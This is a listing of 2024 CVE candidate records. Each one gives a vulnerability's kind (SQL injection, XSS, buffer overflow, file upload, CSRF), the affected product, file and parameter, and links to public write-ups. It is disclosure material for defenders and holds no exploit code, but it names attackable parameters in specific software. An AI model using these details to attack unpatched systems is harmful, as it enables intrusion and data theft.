CVE    2024    2555    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update-admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257054 is the identifier assigned to this vulnerability.    MISC:VDB-257054 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257054   |   MISC:VDB-257054 | SourceCodester Employee Task Management System update-admin.php sql injection   |   URL:https://vuldb.com/?id.257054   |   MISC:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#4sql-injection-vulnerability-in-update-adminphp   |   URL:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#4sql-injection-vulnerability-in-update-adminphp    Assigned (20240316)
CVE    2024    2554    Candidate    A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file update-employee.php. The manipulation of the argument admin_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257053 was assigned to this vulnerability.    MISC:VDB-257053 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257053   |   MISC:VDB-257053 | SourceCodester Employee Task Management System update-employee.php sql injection   |   URL:https://vuldb.com/?id.257053   |   MISC:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#3sql-injection-vulnerability-in-update-employeephp   |   URL:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#3sql-injection-vulnerability-in-update-employeephp    Assigned (20240316)
CVE    2024    2553    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Product Review Rating System 1.0. Affected is an unknown function of the component Rate Product Handler. The manipulation of the argument Your Name/Comment leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257052.    MISC:VDB-257052 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257052   |   MISC:VDB-257052 | SourceCodester Product Review Rating System Rate Product cross site scripting   |   URL:https://vuldb.com/?id.257052   |   MISC:https://github.com/BurakSevben/CVEs/blob/main/Product%20Rating%20System/Product%20Rating%20System%20-%20Cross-Site-Scripting-1.md   |   URL:https://github.com/BurakSevben/CVEs/blob/main/Product%20Rating%20System/Product%20Rating%20System%20-%20Cross-Site-Scripting-1.md    Assigned (20240316)
CVE    2024    25502    Candidate    Directory Traversal vulnerability in flusity CMS v.2.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via the download_backup.php component.    MISC:https://github.com/flusity/flusity-CMS/issues/10    Assigned (20240207)
CVE    2024    25501    Candidate    An issue in WinMail v.7.1 and v.5.1 and before allows a remote attacker to execute arbitrary code via a crafted script to the email parameter.    MISC:https://gist.github.com/Drun1baby/8270239bed2952dbd99cc8d4262728e8    Assigned (20240207)
CVE    2024    2547    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function R7WebsSecurityHandler. The manipulation of the argument password leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257000. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257000 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257000   |   MISC:VDB-257000 | Tenda AC18 R7WebsSecurityHandler stack-based overflow   |   URL:https://vuldb.com/?id.257000   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/R7WebsSecurityHandler.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/R7WebsSecurityHandler.md    Assigned (20240315)
CVE    2024    25469    Candidate    SQL Injection vulnerability in CRMEB crmeb_java v.1.3.4 and before allows a remote attacker to obtain sensitive information via the latitude and longitude parameters in the api/front/store/list component.    MISC:https://github.com/crmeb/crmeb_java/   |   MISC:https://github.com/crmeb/crmeb_java/issues/20    Assigned (20240207)
CVE    2024    25468    Candidate    An issue in TOTOLINK X5000R V.9.1.0u.6369_B20230113 allows a remote attacker to cause a denial of service via the host_time parameter of the NTPSyncWithHost component.    MISC:https://github.com/thKim0/totolink    Assigned (20240207)
CVE    2024    25466    Candidate    Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component.    MISC:https://github.com/FixedOctocat/CVE-2024-25466/tree/main   |   MISC:https://github.com/rnmods/react-native-document-picker/blob/0be5a70c3b456e35c2454aaf4dc8c2d40eb2ab47/android/src/main/java/com/reactnativedocumentpicker/RNDocumentPickerModule.java    Assigned (20240207)
CVE    2024    25461    Candidate    Directory Traversal vulnerability in Terrasoft, Creatio Terrasoft CRM v.7.18.4.1532 allows a remote attacker to obtain sensitive information via a crafted request to the terrasoft.axd component.    MISC:https://safe-surf.ru/specialists/news/697426/   |   MISC:https://safe-surf.ru/upload/ALRT/ALRT-20230808.1.pdf    Assigned (20240207)
CVE    2024    2546    Candidate    A vulnerability has been found in Tenda AC18 15.13.07.09 and classified as critical. Affected by this vulnerability is the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto5g leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256999. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256999 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256999   |   MISC:VDB-256999 | Tenda AC18 fromSetWirelessRepeat stack-based overflow   |   URL:https://vuldb.com/?id.256999   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/A18/fromSetWirelessRepeat_a.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/A18/fromSetWirelessRepeat_a.md    Assigned (20240315)
CVE    2024    25454    Candidate    Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_DescriptorFinder::Test() function.    MISC:https://github.com/axiomatic-systems/Bento4/issues/875    Assigned (20240207)
CVE    2024    25453    Candidate    Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function.    MISC:https://github.com/axiomatic-systems/Bento4/issues/204   |   MISC:https://github.com/axiomatic-systems/Bento4/issues/874    Assigned (20240207)
CVE    2024    25452    Candidate    Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_UrlAtom::AP4_UrlAtom() function.    MISC:https://github.com/axiomatic-systems/Bento4/issues/873    Assigned (20240207)
CVE    2024    25451    Candidate    Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_DataBuffer::ReallocateBuffer() function.    MISC:https://github.com/axiomatic-systems/Bento4/issues/872    Assigned (20240207)
CVE    2024    25450    Candidate    imlib2 v1.9.1 was discovered to mishandle memory allocation in the function init_imlib_fonts().    MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20   |   MISC:https://github.com/derf/feh/issues/712    Assigned (20240207)
CVE    2024    2545    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1730. Reason: This candidate is a duplicate of CVE-2024-1730. Notes: All CVE users should reference CVE-2024-1730 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240315)
CVE    2024    25448    Candidate    An issue in the imlib_free_image_and_decache function of imlib2 v1.9.1 allows attackers to cause a heap buffer overflow via parsing a crafted image.    MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20   |   MISC:https://github.com/derf/feh/issues/711    Assigned (20240207)
CVE    2024    25447    Candidate    An issue in the imlib_load_image_with_error_return function of imlib2 v1.9.1 allows attackers to cause a heap buffer overflow via parsing a crafted image.    MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20   |   MISC:https://github.com/derf/feh/issues/709    Assigned (20240207)
CVE    2024    25446    Candidate    An issue in the HuginBase::PTools::setDestImage function of Hugin v2022.0.0 allows attackers to cause a heap buffer overflow via parsing a crafted image.    FEDORA:FEDORA-2024-60cefb07e8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/   |   MISC:https://bugs.launchpad.net/hugin/+bug/2025037    Assigned (20240207)
CVE    2024    25445    Candidate    Improper handling of values in HuginBase::PTools::Transform::transform of Hugin 2022.0.0 leads to an assertion failure.    FEDORA:FEDORA-2024-60cefb07e8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/   |   MISC:https://bugs.launchpad.net/hugin/+bug/2025038    Assigned (20240207)
CVE    2024    25443    Candidate    An issue in the HuginBase::ImageVariable<double>::linkWith function of Hugin v2022.0.0 allows attackers to cause a heap-use-after-free via parsing a crafted image.    FEDORA:FEDORA-2024-60cefb07e8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/   |   MISC:https://bugs.launchpad.net/hugin/+bug/2025035    Assigned (20240207)
CVE    2024    25442    Candidate    An issue in the HuginBase::PanoramaMemento::loadPTScript function of Hugin v2022.0.0 allows attackers to cause a heap buffer overflow via parsing a crafted image.    FEDORA:FEDORA-2024-60cefb07e8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/   |   MISC:https://bugs.launchpad.net/hugin/+bug/2025032    Assigned (20240207)
CVE    2024    25438    Candidate    A cross-site scripting (XSS) vulnerability in the Submission module of Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Input subject field under the Add Discussion function.    MISC:https://drive.google.com/file/d/1-9yUkbsQ-blYpTsdZoXfu3ALBA5wQCbG/view?usp=sharing   |   MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25438%20-%3E%20Stored%20XSS%20in%20input%20Subject%20of%20the%20Add%20Discussion%20Component%20under%20Submissions    Assigned (20240207)
CVE    2024    25436    Candidate    A cross-site scripting (XSS) vulnerability in the Production module of Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Input subject field under the Add Discussion function.    MISC:https://drive.google.com/file/d/1nSC8OlxsEnOajZ2JYuwoKFZqyB764WkL/view?usp=drivesdk   |   MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25438%20-%3E%20Stored%20XSS%20in%20input%20Subject%20of%20the%20Add%20Discussion%20Component%20under%20Submissions    Assigned (20240207)
CVE    2024    25435    Candidate    A cross-site scripting (XSS) vulnerability in Md1health Md1patient v2.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Msg parameter.    MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25435%20-%3E%20Reflected%20XSS%20on%20md1patient%20login%20page    Assigned (20240207)
CVE    2024    25434    Candidate    A cross-site scripting (XSS) vulnerability in Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Publicname parameter.    MISC:https://drive.google.com/file/d/1MFuAyZukdJeA7HKz8o8pOKLJMjURTZCt/view?usp=sharing   |   MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25434%20-%3E%20Stored%20XSS%20in%20input%20public%20name%20of%20the%20Component    Assigned (20240207)
CVE    2024    25428    Candidate    SQL Injection vulnerability in MRCMS v3.1.2 allows attackers to run arbitrary system commands via the status parameter.    MISC:https://github.com/wuweiit/mushroom/issues/19    Assigned (20240207)
CVE    2024    25423    Candidate    An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file.    MISC:http://cinema.com   |   MISC:http://maxon.com   |   MISC:https://github.com/DriverUnload/cve-2024-25423    Assigned (20240207)
CVE    2024    25422    Candidate    SQL Injection vulnerability in SEMCMS v.4.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the SEMCMS_Menu.php component.    MISC:https://github.com/tzyyyyyyy/semcms    Assigned (20240207)
CVE    2024    25419    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_menu.php.    MISC:https://github.com/Carl0724/cms/blob/main/1.md    Assigned (20240207)
CVE    2024    25418    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_menu.php.    MISC:https://github.com/Carl0724/cms/blob/main/2.md    Assigned (20240207)
CVE    2024    25417    Candidate    flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_translation.php.    MISC:https://github.com/Carl0724/cms/blob/main/3.md    Assigned (20240207)
CVE    2024    25415    Candidate    A remote code execution (RCE) vulnerability in /admin/define_language.php of CE Phoenix v1.0.8.20 allows attackers to execute arbitrary PHP code via injecting a crafted payload into the file english.php.    MISC:https://github.com/capture0x/Phoenix   |   MISC:https://packetstormsecurity.com/files/175913/CE-Phoenix-1.0.8.20-Remote-Command-Execution.html   |   MISC:https://vulners.com/zdt/1337DAY-ID-39172    Assigned (20240207)
CVE    2024    25414    Candidate    An arbitrary file upload vulnerability in /admin/upgrade of CSZ CMS v1.3.0 allows attackers to execute arbitrary code via uploading a crafted Zip file.    MISC:https://github.com/capture0x/CSZ_CMS   |   MISC:https://packetstormsecurity.com/files/175889/CSZ-CMS-1.3.0-Shell-Upload.html    Assigned (20240207)
CVE    2024    25413    Candidate    An XSLT Server Side injection vulnerability in the Import Jobs function of FireBear Improved Import And Export v3.8.6 allows attackers to execute arbitrary commands via a crafted XSLT file.    MISC:https://github.com/capture0x/Magento-ver.-2.4.6   |   MISC:https://packetstormsecurity.com/files/175801/FireBear-Improved-Import-And-Export-3.8.6-XSLT-Server-Side-Injection.html    Assigned (20240207)
CVE    2024    25410    Candidate    flusity-CMS 2.33 is vulnerable to Unrestricted Upload of File with Dangerous Type in update_setting.php.    MISC:https://github.com/flusity/flusity-CMS/issues/9    Assigned (20240207)
CVE    2024    25407    Candidate    SteVe v3.6.0 was discovered to use predictable transaction IDs when receiving a StartTransaction request. This vulnerability can allow attackers to cause a Denial of Service (DoS) by using the predicted transaction IDs to terminate other transactions.    MISC:https://github.com/steve-community/steve/issues/1296    Assigned (20240207)
CVE    2024    25400    Candidate    Subrion CMS 4.2.1 is vulnerable to SQL Injection via ia.core.mysqli.php.    MISC:https://cwe.mitre.org/data/definitions/89.html   |   MISC:https://github.com/intelliants/subrion/issues/910   |   MISC:https://subrion.org/    Assigned (20240207)
CVE    2024    25399    Candidate    Subrion CMS 4.2.1 is vulnerable to Cross Site Scripting (XSS) via adminer.php.    MISC:https://cwe.mitre.org/data/definitions/79    Assigned (20240207)
CVE    2024    25398    Candidate    In Srelay (the SOCKS proxy and Relay) v.0.4.8p3, a specially crafted network payload can trigger a denial of service condition and disrupt the service.    MISC:https://github.com/Nivedita-22/SRELAY-exploit-writeup/blob/main/Srelay.md   |   MISC:https://sourceforge.net/projects/socks-relay/    Assigned (20240207)
CVE    2024    25386    Candidate    Directory Traversal vulnerability in DICOM® Connectivity Framework by laurelbridge before v.2.7.6b allows a remote attacker to execute arbitrary code via the format_logfile.pl file.    MISC:https://gist.github.com/Shulelk/15c9ba8d6b54dd4256a50a24ac7dd0a2   |   MISC:https://laurelbridge.com/security-notice-cve-2024-25386-potential-vulnerability/   |   MISC:https://sec.1i6w31fen9.top/2024/02/02/dcf-operations-window-remote-command-execute/    Assigned (20240207)
CVE    2024    25385    Candidate    An issue in flvmeta v.1.2.2 allows a local attacker to cause a denial of service via the flvmeta/src/flv.c:375:21 function in flv_close.    MISC:https://github.com/hanxuer/crashes/blob/main/flvmeta/01/readme.md   |   MISC:https://github.com/noirotm/flvmeta/issues/23    Assigned (20240207)
CVE    2024    25381    Candidate    There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content.    MISC:https://github.com/Ox130e07d/CVE-2024-25381/blob/main/description   |   MISC:https://github.com/emlog/emlog/issues/285    Assigned (20240207)
CVE    2024    2538    Candidate    The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_permalink' function in all versions up to, and including, 2.4.3.1. This makes it possible for authenticated attackers, with author access and above, to modify the permalinks of arbitrary posts.    MISC:https://gist.github.com/Xib3rR4dAr/b1eec00e844932c6f2f30a63024b404e   |   URL:https://gist.github.com/Xib3rR4dAr/b1eec00e844932c6f2f30a63024b404e   |   MISC:https://plugins.trac.wordpress.org/changeset/3052848#file35   |   URL:https://plugins.trac.wordpress.org/changeset/3052848#file35   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve    Assigned (20240315)
CVE    2024    25373    Candidate    Tenda AC10V4.0 V16.03.10.20 was discovered to contain a stack overflow via the page parameter in the sub_49B384 function.    MISC:https://github.com/cvdyfbwa/IoT-Tenda-Router/blob/main/sub_49B384.md    Assigned (20240207)
CVE    2024    2537    Candidate    Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.    MISC:https://hackerone.com/reports/2376663   |   URL:https://hackerone.com/reports/2376663    Assigned (20240315)
CVE    2024    25369    Candidate    A reflected Cross-Site Scripting (XSS) vulnerability in FUEL CMS 1.5.2 allows attackers to run arbitrary code via a crafted string after the group_id parameter.    MISC:https://github.com/liyako/vulnerability/blob/main/POC/FUEL%20CMS%20Reflected%20Cross-Site%20Scripting%20(XSS).md    Assigned (20240207)
CVE    2024    25366    Candidate    Buffer Overflow vulnerability in mz-automation.de libiec61850 v.1.4.0 allows a remote attacker to cause a denial of service via the mmsServer_handleGetNameListRequest function to the mms_getnamelist_service component.    MISC:https://github.com/mz-automation/libiec61850   |   MISC:https://github.com/mz-automation/libiec61850/issues/492   |   MISC:https://www.mz-automation.de/    Assigned (20240207)
CVE    2024    25360    Candidate    A hidden interface in Motorola CX2L Router firmware v1.0.1 leaks information regarding the SystemWizardStatus component via sending a crafted request to device_web_ip.    MISC:https://github.com/leetsun/Hints/tree/main/moto-CX2L/4    Assigned (20240207)
CVE    2024    25359    Candidate    An issue in zuoxingdong lagom v.0.1.2 allows a local attacker to execute arbitrary code via the pickle_load function of the serialize.py file.    MISC:https://github.com/bayuncao/vul-cve-10    Assigned (20240207)
CVE    2024    25351    Candidate    SQL Injection vulnerability in /zms/admin/changeimage.php in PHPGurukul Zoo Management System 1.0 allows attackers to run arbitrary SQL commands via the editid parameter.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/ZooManagementSystem-SQL_Injection_Change_Image.md    Assigned (20240207)
CVE    2024    25350    Candidate    SQL Injection vulnerability in /zms/admin/edit-ticket.php in PHPGurukul Zoo Management System 1.0 via tickettype and tprice parameters.    MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/ZooManagementSystem-SQL_Injection_Edit_Ticket.md    Assigned (20240207)
CVE    2024    2535    Candidate    A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/users.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256972. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256972 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256972   |   MISC:VDB-256972 | MAGESH-K21 Online-College-Event-Hall-Reservation-System users.php cross site scripting   |   URL:https://vuldb.com/?id.256972   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20users.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20users.php.md    Assigned (20240315)
CVE    2024    25344    Candidate    Cross Site Scripting vulnerability in ITFlow.org before commit v.432488eca3998c5be6b6b9e8f8ba01f54bc12378 allows a remote attacker to execute arbitrary code and obtain sensitive information via the settings.php, settings+company.php, settings_defaults.php, settings_integrations.php, settings_invoice.php, settings_localization.php, settings_mail.php components.    MISC:https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378   |   MISC:https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46   |   MISC:https://itflow.org/   |   MISC:https://packetstormsecurity.com/files/177224/ITFlow-Cross-Site-Request-Forgery.html    Assigned (20240207)
CVE    2024    2534    Candidate    A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/users.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256971. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256971 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256971   |   MISC:VDB-256971 | MAGESH-K21 Online-College-Event-Hall-Reservation-System users.php sql injection   |   URL:https://vuldb.com/?id.256971   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20users.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20users.php.md    Assigned (20240315)
CVE    2024    25331    Candidate    DIR-822 Rev. B Firmware v2.02KRB09 and DIR-822-CA Rev. B Firmware v2.03WWb01 suffer from a LAN-Side Unauthenticated Remote Code Execution (RCE) vulnerability elevated from HNAP Stack-Based Buffer Overflow.    MISC:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10372   |   MISC:https://www.ensigninfosecurity.com/advisories/vulnerability-advisories/2    Assigned (20240207)
CVE    2024    2533    Candidate    A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256970 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256970 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256970   |   MISC:VDB-256970 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-users.php cross site scripting   |   URL:https://vuldb.com/?id.256970   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-users.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-users.php.md    Assigned (20240315)
CVE    2024    25327    Candidate    Cross Site Scripting (XSS) vulnerability in Justice Systems FullCourt Enterprise v.8.2 allows a remote attacker to execute arbitrary code via the formatCaseNumber parameter of the Citation search function.    MISC:https://packetstormsecurity.com/files/177500/FullCourt-Enterprise-8.2-Cross-Site-Scripting.html    Assigned (20240207)
CVE    2024    25325    Candidate    SQL injection vulnerability in Employee Management System v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to the txtemail parameter in the login.php.    MISC:https://cxsecurity.com/issue/WLB-2024020062    Assigned (20240207)
CVE    2024    25320    Candidate    Tongda OA v2017 and up to v11.9 was discovered to contain a SQL injection vulnerability via the $AFF_ID parameter at /affair/delete.php.    MISC:https://github.com/cqliuke/cve/blob/main/sql.md    Assigned (20240207)
CVE    2024    2532    Candidate    A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256969 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256969 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256969   |   MISC:VDB-256969 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-users.php sql injection   |   URL:https://vuldb.com/?id.256969   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-users.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-users.php.md    Assigned (20240315)
CVE    2024    25318    Candidate    Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'pid' parameter in Hotel/admin/print.php?pid=2.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-3.md    Assigned (20240207)
CVE    2024    25316    Candidate    Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'eid' parameter in Hotel/admin/usersettingdel.php?eid=2.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-4.md    Assigned (20240207)
CVE    2024    25315    Candidate    Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'rid' parameter in Hotel/admin/roombook.php?rid=2.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-1.md    Assigned (20240207)
CVE    2024    25314    Candidate    Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'sid' parameter in Hotel/admin/show.php?sid=2.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-2.md    Assigned (20240207)
CVE    2024    25313    Candidate    Code-projects Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at School/teacher_login.php.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20Authentication%20Bypass%20-%202.md    Assigned (20240207)
CVE    2024    25312    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/sub_delete.php?id=5."    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-5.md    Assigned (20240207)
CVE    2024    25310    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/delete.php?id=5."    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-3.md    Assigned (20240207)
CVE    2024    2531    Candidate    A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/update-rooms.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256968 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256968   |   MISC:VDB-256968 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php unrestricted upload   |   URL:https://vuldb.com/?id.256968   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20update-rooms.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20update-rooms.php.md    Assigned (20240315)
CVE    2024    25309    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'pass' parameter at School/teacher_login.php.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-7.md    Assigned (20240207)
CVE    2024    25308    Candidate    Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'name' parameter at School/teacher_login.php.    MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-6.md    Assigned (20240207)
CVE    2024    25307    Candidate    Code-projects Cinema Seat Reservation System 1.0 allows SQL Injection via the 'id' parameter at "/Cinema-Reservation/booking.php?id=1."    MISC:https://github.com/tubakvgc/CVEs/blob/main/Cinema%20Seat%20Reservation%20System/Cinema%20Seat%20Reservation%20System%20-%20SQL%20Injection.md    Assigned (20240207)
